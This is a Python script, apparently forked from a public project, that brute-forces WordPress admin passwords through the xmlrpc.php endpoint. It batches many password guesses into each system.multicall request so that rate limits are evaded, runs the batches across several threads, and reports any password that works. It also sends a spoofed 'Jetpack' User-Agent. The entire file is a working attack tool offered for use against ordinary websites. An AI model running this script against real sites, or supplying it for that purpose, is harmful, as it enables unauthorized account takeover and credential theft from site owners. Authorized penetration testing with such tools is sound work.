#!/usr/bin/env python
# wpxmlrpcbrute.py (executable script, forked from DavidWittman/wpxmlrpcbrute)
import argparse
import logging
import Queue
import sys
import threading
import time
import xml.etree.ElementTree as XmlTree
from datetime import datetime
from xml.sax.saxutils import escape as xml_escape

import requests
# Quiet the requests library so that only its critical messages get through.
logging.getLogger('requests').setLevel(logging.CRITICAL)

# Root logging format: timestamp, logger name, severity, message.
logging.basicConfig(
    format='%(asctime)s %(name)s %(levelname)s %(message)s',
)

# Logger used by every function in this script.
log = logging.getLogger('wpxmlbrute')
# Opening of the system.multicall envelope. One XML_REQ struct per attempted
# password is appended after it, and XML_END closes the document.
XML_START = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<methodCall>'
    '<methodName>system.multicall</methodName> '
    '<params><param><value><array><data><value>'
)
XML_END = '</value></data></array></value></param></params></methodCall>'

# A single wp.getAuthors call. The two %s placeholders are filled with the
# username and the password, in that order.
XML_REQ = (
    '<struct>'
    '<member><name>methodName</name>'
    '<value><string>wp.getAuthors</string></value></member>'
    '<member><name>params</name><value><array><data>'
    '<value><string>1</string></value>'
    '<value><string>%s</string></value>'
    '<value><string>%s</string></value>'
    '</data></array></value></member>'
    '</struct>'
)

# Value of the User-Agent header sent with each request.
DEFAULT_USER_AGENT = 'Jetpack'
def generate_request_body(user, passwords):
    """Build one system.multicall request body that tries many passwords.

    Args:
        user: Username placed in every wp.getAuthors call.
        passwords: Iterable of candidate passwords; one call is emitted per
            entry, in the order given.

    Returns:
        The complete XML document as a single string: XML_START, one
        XML_REQ per password, then XML_END.
    """
    # Escape XML metacharacters. A raw '&', '<' or '>' in the username or in
    # any password would otherwise make the whole document malformed XML.
    safe_user = xml_escape(user)
    calls = [
        XML_REQ % (safe_user, xml_escape(password))
        for password in passwords
    ]
    return ''.join([XML_START] + calls + [XML_END])
def brute_attempt(url, user, passwords):
    """Send one batch of passwords and report which one, if any, worked.

    Args:
        url: URL the request is POSTed to.
        user: Username to try the passwords against.
        passwords: List of candidate passwords sent in this single request.

    Returns:
        The password at the position of the first response struct whose
        first member is not named 'faultCode', or None when every struct
        in the response is a fault.

    Raises:
        Nothing is caught here: errors from requests.post and from the XML
        parser (for example a response that is not well-formed XML)
        propagate to the caller.
    """
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': DEFAULT_USER_AGENT,
    }
    response = requests.post(
        url,
        data=generate_request_body(user, passwords),
        headers=headers,
    )

    # Parse the raw bytes so the XML parser applies the encoding declared in
    # the document itself, rather than the charset requests guessed when
    # decoding response.text. A decoded unicode string containing non-ASCII
    # characters cannot be fed to the parser on Python 2.
    xml_root = XmlTree.fromstring(response.content)

    # Structs are matched to passwords by position: the n-th struct found is
    # taken to be the answer for the n-th password of the batch.
    for index, struct in enumerate(xml_root.findall('.//struct')):
        if struct[0].findtext('name') != 'faultCode':
            return passwords[index]
    return None
def brute_consumer(queue, results, url, user):
    """Worker loop: take password batches off the queue and try each one.

    Args:
        queue: Queue of password lists produced by populate_queue.
        results: Shared list; every password that brute_attempt reports as
            valid is appended to it.
        url: URL passed through to brute_attempt.
        user: Username passed through to brute_attempt.

    The loop ends as soon as the queue is found empty.
    NOTE(review): that also happens if the workers drain the queue faster
    than the producer fills it -- confirm this is acceptable.
    """
    while True:
        try:
            # Non-blocking on purpose. A blocking get() never raises
            # Queue.Empty, so checking empty() and then calling get() could
            # leave this thread waiting forever when another worker takes
            # the last batch in between the two calls.
            passwords = queue.get_nowait()
        except Queue.Empty:
            break

        found = brute_attempt(url, user, passwords)
        if found is not None:
            results.append(found)
def populate_queue(queue, wordlist, count):
    """Read the wordlist and enqueue its passwords in batches.

    Args:
        queue: Queue that receives the batches. put() is called in blocking
            mode, so this function waits while the queue is full.
        wordlist: Path of the password file, one candidate per line.
        count: Number of passwords per batch. A final, shorter batch is
            enqueued when the file does not divide evenly.
    """
    group = []
    with open(wordlist) as f:
        for line in f:
            # Remove only the line terminator. Leading or trailing spaces
            # and tabs may be part of the candidate password, so they are
            # kept exactly as written in the wordlist.
            group.append(line.rstrip('\r\n'))
            if len(group) == count:
                queue.put(group, block=True)
                group = []

    # End of file reached: flush whatever did not fill a complete batch.
    if group:
        log.debug("Finished processing %s. Waiting for workers to "
                  "complete." % wordlist)
        queue.put(group, block=True)
def main():
    """Parse the command line, run the brute force and print the outcome.

    A producer thread fills a bounded queue with password batches read from
    the wordlist while worker threads consume them. The function returns
    after printing the password when one is found.

    Raises:
        SystemExit: with a message when --count or --threads is below 1,
            and with status 1 when no password from the wordlist worked.
    """
    desc = "Brute force WordPress sites vulnerable to XML-RPC amplification."
    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument('-c', '--count', type=int, default=100,
        help="Number of passwords to send in each request. Default: 100")
    parser.add_argument('-t', '--threads', type=int, default=4,
        help="Number of threads to spawn. Default: 4")
    parser.add_argument('-u', '--user', default="admin",
        help="WordPress username to brute force. Default: admin")
    # TODO: This doesn't actually do anything
    #parser.add_argument('-a', '--user-agent', default="")
    parser.add_argument('-l', '--level', type=int, default=1,
        help="Log level (1-5). 1 = debug, 5 = critical. Default: 1")
    parser.add_argument('url', help="URL of WordPress site to brute force")
    parser.add_argument('wordlist', help="Path of the password list to use")
    args = parser.parse_args()

    # Reject unusable values before doing any work. With zero workers the
    # run would end at once and wrongly report that no password matched.
    if args.count < 1:
        raise SystemExit("count should be >= 1")
    if args.threads < 1:
        raise SystemExit("threads should be >= 1")

    # The 1-5 scale of --level maps onto logging's 10-50 levels.
    log.setLevel(args.level * 10)

    # Make sure the target URL points at the xmlrpc.php endpoint.
    if not args.url.endswith('xmlrpc.php'):
        if not args.url.endswith('/'):
            args.url += '/'
        args.url += 'xmlrpc.php'

    threads = []
    queue = Queue.Queue(maxsize=args.threads * 10)
    results = []
    start_time = datetime.now()

    producer = threading.Thread(
        target=populate_queue,
        args=(queue, args.wordlist, args.count),
    )
    producer.daemon = True
    producer.start()

    # Give the producer a head start, but stop waiting once it has exited.
    # A wordlist with fewer than threads * count entries (or a producer
    # that failed) never yields that many batches, and waiting on the queue
    # size alone would then loop forever.
    while producer.is_alive() and queue.qsize() < args.threads:
        log.debug("Waiting for queue to populate. Size: %s", queue.qsize())
        time.sleep(0.1)

    for _ in range(args.threads):
        t = threading.Thread(
            target=brute_consumer,
            args=(queue, results, args.url, args.user),
        )
        log.debug("Starting %s", t.name)
        t.daemon = True
        t.start()
        threads.append(t)

    # Poll the workers until they have all finished or one found a password.
    while True:
        # Iterate over a copy: removing from the list being iterated would
        # skip the element that follows each removed thread.
        for t in list(threads):
            if t.is_alive():
                t.join(0.25)
            else:
                log.debug("%s complete", t.name)
                threads.remove(t)
        log.debug("Threads running: %s", len(threads))
        log.debug("Queue size: %s", queue.qsize())
        if not threads or results:
            break

    log.debug("Results: %s", results)
    log.info("Elapsed time: %s", datetime.now() - start_time)

    if results:
        print("Password found for %s: %s" % (args.user, results[0]))
    else:
        print("Password not found in wordlist")
        sys.exit(1)
# Run the command-line tool only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()